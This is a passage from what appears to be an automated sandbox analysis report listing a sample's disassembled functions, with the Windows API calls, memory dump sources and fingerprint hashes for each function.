                                    • Opcode Fuzzy Hash: d6b0ae3c1938b0aa392649a4c1ec28da1ad91f14923157a8c7490304b8e87735
                                    • Instruction Fuzzy Hash: 7FD18C75A0060AAFDF50CFA8CC85AAEB7B5FF48344F158069E915EB281E7709D45CFA0
                                    Function 007C1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?), ref: 007C15CE
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007C1651
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007C16E4
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007C16FB
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007C1777
                                    • __freea.LIBCMT ref: 007C17A2
                                    • __freea.LIBCMT ref: 007C17AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 2829977744-0
                                    • Opcode ID: 5e4bfa034fa628ee7e77fbb5f24352ea2a88ab77ba909b7aa266aa53ce619875
                                    • Instruction ID: 48c830c37935c7503f38fb12c9f173480405cf5ac042213de6a604e5e263d7e0
                                    • Opcode Fuzzy Hash: 5e4bfa034fa628ee7e77fbb5f24352ea2a88ab77ba909b7aa266aa53ce619875
                                    • Instruction Fuzzy Hash: D8918271E002169ADB208E74D895FEE7BB5AF4A710F98467DE801E7242DB39DD50CBA0
                                    Function 00804523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2610073882-625585964
                                    • Opcode ID: 38e11b34f4f8f7417e7ef7e01970ca216a7869362f911bef9dfba21f51abc282
                                    • Instruction ID: e7cdf7bff796a9151327a04e60ea5d71b98cdc7305baa095c4e03e1a83165356
                                    • Opcode Fuzzy Hash: 38e11b34f4f8f7417e7ef7e01970ca216a7869362f911bef9dfba21f51abc282
                                    • Instruction Fuzzy Hash: 24919DB1A40219ABDF60CFA4CC48FAEBBB8FF46714F108559F615EB281D7709945CBA0
                                    Function 007F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 007F125C
                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007F1284
                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007F12A8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F12D8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F135F
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F13C4
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007F1430
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                    • String ID:
                                    • API String ID: 2550207440-0
                                    • Opcode ID: 9768d362fc5bcc8546b5540296ebe42c7092f5505bf39c7e7986d66cada0a39a
                                    • Instruction ID: 759b4816fad5b0b321e8caaad3aaf983bf6d8e2cb3c4e75e360dddd07b63fdce
                                    • Opcode Fuzzy Hash: 9768d362fc5bcc8546b5540296ebe42c7092f5505bf39c7e7986d66cada0a39a
                                    • Instruction Fuzzy Hash: 2291AF71A00219EFDB01DFA4D888BBEB7B5FF45325F508029EA11EB391D778A941CB90
                                    Function 0079948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 2a47ff5b488e2e75364b87e1940e747b9b049e9de84d9859f51a90e049357e6b
                                    • Instruction ID: 0d8141f05aef44add08fe9bc034301b2965beb795793c84028256af353f0bd18
                                    • Opcode Fuzzy Hash: 2a47ff5b488e2e75364b87e1940e747b9b049e9de84d9859f51a90e049357e6b
                                    • Instruction Fuzzy Hash: 0E913671940219EFDF14CFA9D888AEEBBB8FF49320F148059E515B7291D378A951CB60
                                    Function 00803947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0080396B
                                    • CharUpperBuffW.USER32(?,?), ref: 00803A7A
                                    • _wcslen.LIBCMT ref: 00803A8A
                                    • VariantClear.OLEAUT32(?), ref: 00803C1F
                                      • Part of subcall function 007F0CDF: VariantInit.OLEAUT32(00000000), ref: 007F0D1F
                                      • Part of subcall function 007F0CDF: VariantCopy.OLEAUT32(?,?), ref: 007F0D28
                                      • Part of subcall function 007F0CDF: VariantClear.OLEAUT32(?), ref: 007F0D34
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4137639002-1221869570
                                    • Opcode ID: 86a8556bc399e6144553d2eb9a5c9bafeb376aa8712b7c7c74572843bb07b6d0
                                    • Instruction ID: 2f938859f5246a6b9c50ae0d9624bc68f250bea2224b27dc3e7b129a2d064d82
                                    • Opcode Fuzzy Hash: 86a8556bc399e6144553d2eb9a5c9bafeb376aa8712b7c7c74572843bb07b6d0
                                    • Instruction Fuzzy Hash: 9E9125746083059FC744EF24C89596AB7E8FF89314F14882DF88A97391DB35EE05CB92
                                    Function 00804BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?,?,007E035E), ref: 007E002B
                                      • Part of subcall function 007E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0046
                                      • Part of subcall function 007E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0054
                                      • Part of subcall function 007E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?), ref: 007E0064
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00804C51
                                    • _wcslen.LIBCMT ref: 00804D59
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00804DCF
                                    • CoTaskMemFree.OLE32(?), ref: 00804DDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 614568839-2785691316
                                    • Opcode ID: 1e4229607db868ee800d9769adc0372e3da80c8c5c6eb273cd18eb5d2d2ac511
                                    • Instruction ID: 5275f2b6829e067e8d3d8962f17135d2fcd5de4c4809c35acaccb12dc0fc1013
                                    • Opcode Fuzzy Hash: 1e4229607db868ee800d9769adc0372e3da80c8c5c6eb273cd18eb5d2d2ac511
                                    • Instruction Fuzzy Hash: F19106B1D4021DEFDF14EFA4CC95AEEB7B8FF48314F10816AE915A7291DB349A448B60
                                    Function 008120FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 00812183
                                    • GetMenuItemCount.USER32(00000000), ref: 008121B5
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008121DD
                                    • _wcslen.LIBCMT ref: 00812213
                                    • GetMenuItemID.USER32(?,?), ref: 0081224D
                                    • GetSubMenu.USER32(?,?), ref: 0081225B
                                      • Part of subcall function 007E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E3A57
                                      • Part of subcall function 007E3A3D: GetCurrentThreadId.KERNEL32 ref: 007E3A5E
                                      • Part of subcall function 007E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007E25B3), ref: 007E3A65
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008122E3
                                      • Part of subcall function 007EE97B: Sleep.KERNEL32 ref: 007EE9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                    • String ID:
                                    • API String ID: 4196846111-0
                                    • Opcode ID: 44b9b0ab5193f9b7f097d1745a7ef4b14a01948d2277ab0be6e8131e97c3ab93
                                    • Instruction ID: 689ea81d551e7111726bbdc9ff7a722008080b37ca56d6422dd9ec28c1239d0e
                                    • Opcode Fuzzy Hash: 44b9b0ab5193f9b7f097d1745a7ef4b14a01948d2277ab0be6e8131e97c3ab93
                                    • Instruction Fuzzy Hash: 57716C75A00215EFCB10EF68C845AEEB7F9FF88310F148459E916EB351DB38A9918B90
                                    Function 00817E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(010A7480), ref: 00817F37
                                    • IsWindowEnabled.USER32(010A7480), ref: 00817F43
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0081801E
                                    • SendMessageW.USER32(010A7480,000000B0,?,?), ref: 00818051
                                    • IsDlgButtonChecked.USER32(?,?), ref: 00818089
                                    • GetWindowLongW.USER32(010A7480,000000EC), ref: 008180AB
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008180C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    • Opcode ID: 4702bfacc0bdc455a19023a084587ecc559852b7a4b4408bd81944521ec37649
                                    • Instruction ID: 1c657bca4759408cb6e4f74f934b7ca4b3e59e9a8934d5b009eed3a3036b12a1
                                    • Opcode Fuzzy Hash: 4702bfacc0bdc455a19023a084587ecc559852b7a4b4408bd81944521ec37649
                                    • Instruction Fuzzy Hash: 4C715774608208AFEB219F64C885FEBBBBDFF19300F14445DE946D7261CB31A986CB20
                                    Function 007EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 007EAEF9
                                    • GetKeyboardState.USER32(?), ref: 007EAF0E
                                    • SetKeyboardState.USER32(?), ref: 007EAF6F
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 007EAF9D
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 007EAFBC
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 007EAFFD
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007EB020
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: f1597f816f58380c1b96d7e784af9f70855907b2cc2e05ab4504a8fb49019ab1
                                    • Instruction ID: 7aa22f73f574c499394a8e3e0dd77226a48c7facf69957f0310909d27f281cf8
                                    • Opcode Fuzzy Hash: f1597f816f58380c1b96d7e784af9f70855907b2cc2e05ab4504a8fb49019ab1
                                    • Instruction Fuzzy Hash: 9751C0A06057D53DFB3683368849BBBBFA96F0A304F088489E1D9958D2C39CFC88D751
                                    Function 007EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 007EAD19
                                    • GetKeyboardState.USER32(?), ref: 007EAD2E
                                    • SetKeyboardState.USER32(?), ref: 007EAD8F
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007EADBB
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007EADD8
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007EAE17
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007EAE38
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 1cb104647d9d6696cdcd16982520fa383e48fca509877e9cc03430b47971fdd8
                                    • Instruction ID: adc7acb08ef5b820f4d22631e8e3f115c6716ad5ab32c174cf526fb9809fa888
                                    • Opcode Fuzzy Hash: 1cb104647d9d6696cdcd16982520fa383e48fca509877e9cc03430b47971fdd8
                                    • Instruction Fuzzy Hash: B851F7A16067D53DFB3383368C96BBA7F996F49304F088588E1D5468C2D29CFC88D752
                                    Function 007B542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(007C3CD6,?,?,?,?,?,?,?,?,007B5BA3,?,?,007C3CD6,?,?), ref: 007B5470
                                    • __fassign.LIBCMT ref: 007B54EB
                                    • __fassign.LIBCMT ref: 007B5506
                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,007C3CD6,00000005,00000000,00000000), ref: 007B552C
                                    • WriteFile.KERNEL32(?,007C3CD6,00000000,007B5BA3,00000000,?,?,?,?,?,?,?,?,?,007B5BA3,?), ref: 007B554B
                                    • WriteFile.KERNEL32(?,?,00000001,007B5BA3,00000000,?,?,?,?,?,?,?,?,?,007B5BA3,?), ref: 007B5584
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: 1b80c0903db6dd2f87565dd62053ee164930b4b49b69011372abf3b8ca45c977
                                    • Instruction ID: 53b13f2e7400eb78163313d1d209b0e8c358d6b32777845fa1ae66b66eb38038
                                    • Opcode Fuzzy Hash: 1b80c0903db6dd2f87565dd62053ee164930b4b49b69011372abf3b8ca45c977
                                    • Instruction Fuzzy Hash: 9751D471A00649AFDB20CFA8D845BEEBBFAFF09301F14411AF555E7291E7349A51CB60
                                    Function 008010B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0080304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0080307A
                                      • Part of subcall function 0080304E: _wcslen.LIBCMT ref: 0080309B
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00801112
                                    • WSAGetLastError.WSOCK32 ref: 00801121
                                    • WSAGetLastError.WSOCK32 ref: 008011C9
                                    • closesocket.WSOCK32(00000000), ref: 008011F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 2675159561-0
                                    • Opcode ID: 85227fdc2a95695c820dda9afdd3aa9dba54ce964205486d62aa6f597f5f0b8a
                                    • Instruction ID: 6ca8544980cf945fddc0758077bf4f5a90e012537b4141d5bee1f3e3f09d7b24
                                    • Opcode Fuzzy Hash: 85227fdc2a95695c820dda9afdd3aa9dba54ce964205486d62aa6f597f5f0b8a
                                    • Instruction Fuzzy Hash: 5C41C032600204AFDB149F18CC89BAABBE9FF45328F148059F919DB2D1C774ED41CBA1
                                    Function 007ECF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007ECF22,?), ref: 007EDDFD
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007ECF22,?), ref: 007EDE16
                                    • lstrcmpiW.KERNEL32(?,?), ref: 007ECF45
                                    • MoveFileW.KERNEL32(?,?), ref: 007ECF7F
                                    • _wcslen.LIBCMT ref: 007ED005
                                    • _wcslen.LIBCMT ref: 007ED01B
                                    • SHFileOperationW.SHELL32(?), ref: 007ED061
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 3164238972-1173974218
                                    • Opcode ID: f7f8c66531221d71fc64baaa5e68776b83e50f993155d84738a48cd35a955945
                                    • Instruction ID: 278577081bc1c1fd43f542f24d7c1e3aab4b6bd0e690b9b6c5abcb544d7691b3
                                    • Opcode Fuzzy Hash: f7f8c66531221d71fc64baaa5e68776b83e50f993155d84738a48cd35a955945
                                    • Instruction Fuzzy Hash: 2341987694615C9FDF12EBA4C985ADEB7BDAF4C340F0400E6E505EB141EB38AA85CB10
                                    Function 00812DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00812E1C
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00812E4F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00812E84
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00812EB6
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00812EE0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00812EF1
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00812F0B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: 146ee7bc5e507a9202fe1c02be85c95fdbd0ba511f10987387d28f5b0b15002e
                                    • Instruction ID: 8dfab8411189c04e446a0c68380b327bfe413c63dbbd799b714f7b2025220e00
                                    • Opcode Fuzzy Hash: 146ee7bc5e507a9202fe1c02be85c95fdbd0ba511f10987387d28f5b0b15002e
                                    • Instruction Fuzzy Hash: A8310270644250AFDF20CF58EC88FA53BA9FF9A711F1441A4F911CB2B2CB61ACA09B01
                                    Function 007E7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E7769
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E778F
                                    • SysAllocString.OLEAUT32(00000000), ref: 007E7792
                                    • SysAllocString.OLEAUT32(?), ref: 007E77B0
